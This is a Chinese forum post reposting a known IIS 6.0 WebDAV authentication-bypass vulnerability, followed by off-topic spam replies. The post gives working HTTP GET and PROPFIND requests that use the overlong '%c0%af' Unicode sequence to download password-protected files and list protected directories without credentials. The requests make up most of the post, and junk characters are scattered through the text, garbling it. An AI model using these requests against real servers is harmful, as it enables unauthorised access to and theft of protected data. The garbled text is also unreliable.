返回列表 发新帖

绕过IIS 6.0 WebDAV的远程身份验证

3,489.2k 14
DeGe 发表于 2013-7-3 17:12:36|湖北 | 查看全部 阅读模式

漏洞发现者:Nikolaos Rangos
3 A0 q1 ~5 Z0 T1 V具体漏洞存在于带WebDAV功能的IIS 6.0中7 A" }; ]. U; N
Web服务器没有正确地处理Unicode命令的URI时,解析和发送回的数据. & B. S4 y- n. _- o
假设有一个密码保护文件夹d:\inetpub\wwwroot\protected\ . Q5 g; b0 O7 D& H  z% c
此文件夹内有一个名为 protected.zip "
, Q8 P+ J2 J$ ^向服务器发送一个HTTP GET请求. C3 }7 l" C' E5 s" i# Y. V
GET /  %c0%af/protected/protected.zip HTTP/1.1
# p& x3 d* i, ^/ v, c         Translate: f
4 R+ f- y$ Q, Q2 R/ Q         Connection: close, w1 q# C6 ~$ l5 O( ~5 U
         Host: servernameMu
6 ]! q  B! ]4 F$ Q指示Web服务器处理请求使用 WebDAV的1 n+ C, E: b8 z/ S6 }/ @
利用这种恶意的URI构建网络服务器发送文件到
. B* j! }, E! B/protected/ protected.zip ”而不要求进行适当的验证
2 f# `* a+ T) l) b, o另一个有效的请求可能会传送到Web服务器是:

GET /prot%c0%afected/protected.zip HTTP/1.1
/ z5 _- P8 q3 m& {& k         Translate: f
% W6 w9 H% w$ ~  I6 z         Connection: close
' C8 l" Y! H, h, u         Host: servername4 Q% D2 _3 l2 _0 e% K& Z
IIS 6.0中将会删除„%c0%af” 的请求,并发送回密码保护文件而不验证.
; j( d5 p* H) ]7 ~* g' H; L" C: N# AASP脚本不能下载,除非以这种方式提供服务的脚本源代码是启用的 $ f# {& C  c& p. H+ r9 ~, |
可以绕过访问限制的,密码保护文件夹和列表,下载,上传和修改文件
5 E. X# h4 I2 c* j6 FCopy code        PROPFIND /protec%c0%afted/ HTTP/1.1
9 `; V9 `" I  V) l' E3 I( d        Host: servername
* B2 U4 q; ]! N2 _; h        User-Agent: neo/0.12.2 6 C6 }4 o. B/ Q0 N- O0 w
        Connection: TE ) D  a. Q) l0 t0 M) `+ D. m1 R
        TE: trailers
3 H, {* V% v. P" J  L" L. i/ F        Depth: 1 ) X# E1 n+ [9 e
        Content-Length: 288
/ c5 m* {$ T2 T% q        Content-Type: application/xml# O" t- k, O8 \  ~
        <?xml version="1.0" encoding="utf-8"?>1 C9 m+ o1 W" h# q
        <propfind xmlns="DAV:"><prop>
9 a; p- m) Y% i4 i        <getcontentlength xmlns="DAV:"/>
" S* a  {4 s1 U9 V        <getlastmodified xmlns="DAV:"/>
, E: R. L$ e8 V# K6 X3 d4 }        <executable xmlns="http://apache.org/dav/props/"/> 3 V# _! O/ n8 ?2 P
        <resourcetype xmlns="DAV:"/>9 }6 [( O6 b5 o! ^1 W' T  ~5 H
        <checked-in xmlns="DAV:"/>
8 m; Y1 T$ d4 K) y        <checked-out xmlns="DAV:"/>/ ~3 Y# r7 J) p) B
        </prop></propfind>

IIS的回应的目录列表的文件夹中没有要求输入密码


; H( F/ u6 S& b3 u

回复|共 14 个

亮凌庚 Lv.15 发表于 2014-9-28 18:35:19|Reserved | 查看全部
怎么就没人拜我为偶像那??
ofbnbaiinfnh Lv.8 发表于 2014-9-28 18:56:51|俄罗斯 | 查看全部
女人啊真是那句话~~~无理占三分~~忘记怎么说了 呵呵 ~~你帮我想想
kwjvtwzx Lv.15 发表于 2014-9-28 18:58:46|美国 | 查看全部
这篇帖子构思新颖,题材独具匠心,段落清晰,情节诡异,跌宕起伏,主线分明,引人入胜,平淡中显示出不凡的文学功底,可谓是字字珠玑,句句经典,是我辈应当学习之典范(不好意思回错帖了
kjlqiyjws Lv.8 发表于 2014-9-28 19:11:01|INNA | 查看全部
顶顶多好,大家都来!
kwjvtwzx Lv.15 发表于 2014-9-28 19:19:41|美国 | 查看全部
我也不知道了~~你把我问蒙了 呵呵
oxdbw Lv.8 发表于 2014-10-24 18:18:04|俄罗斯 | 查看全部
什么什么啊??
uhxidjjr Lv.8 发表于 2014-10-24 18:37:08|韩国 | 查看全部
嘿...反了反了,,,,
xiaoye Lv.9 发表于 2014-10-24 18:37:24|美国 | 查看全部
哎 我我我怎么办啊??
kwjvtwzx Lv.15 发表于 2014-10-24 18:53:19|美国 | 查看全部
哥们,给我做个链接吧
爱上空心菜 Lv.7 发表于 2015-2-10 13:38:17|日本 | 查看全部
嘻嘻~` 要是只看你的话~`~`` 很容易让人家以为你也跟偶们一样是天使类~`(偷笑中````````
seazvyt 发表于 2015-2-10 13:39:08|美国 | 查看全部
呵呵 放心 如我算错 你以后来砸我的帖子 呵呵
长颈鹿王77 Lv.7 发表于 2015-2-10 13:40:29|美国 | 查看全部
呵呵 我可不敢~~~~
tohme 发表于 2015-2-10 13:40:53|欧洲和中东地区 | 查看全部
我不是来为楼主呐喊加油的,也不是对楼主进行围堵攻击的。

回复

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

得知互动是一个融创意、设计、开发、营销、生活、互联网于一体的专业交流分享平台。
Copyright © 2026 站长技术交流论坛|互联网技术交流平台|Ai技术交流平台 版权所有 All Rights Reserved. Powered by Discuz! X5.0 鄂ICP备15006301号-5|鄂公网安备 42018502006730号
关灯 在本版发帖 扫一扫添加QQ客服 返回顶部
快速回复 返回顶部 返回列表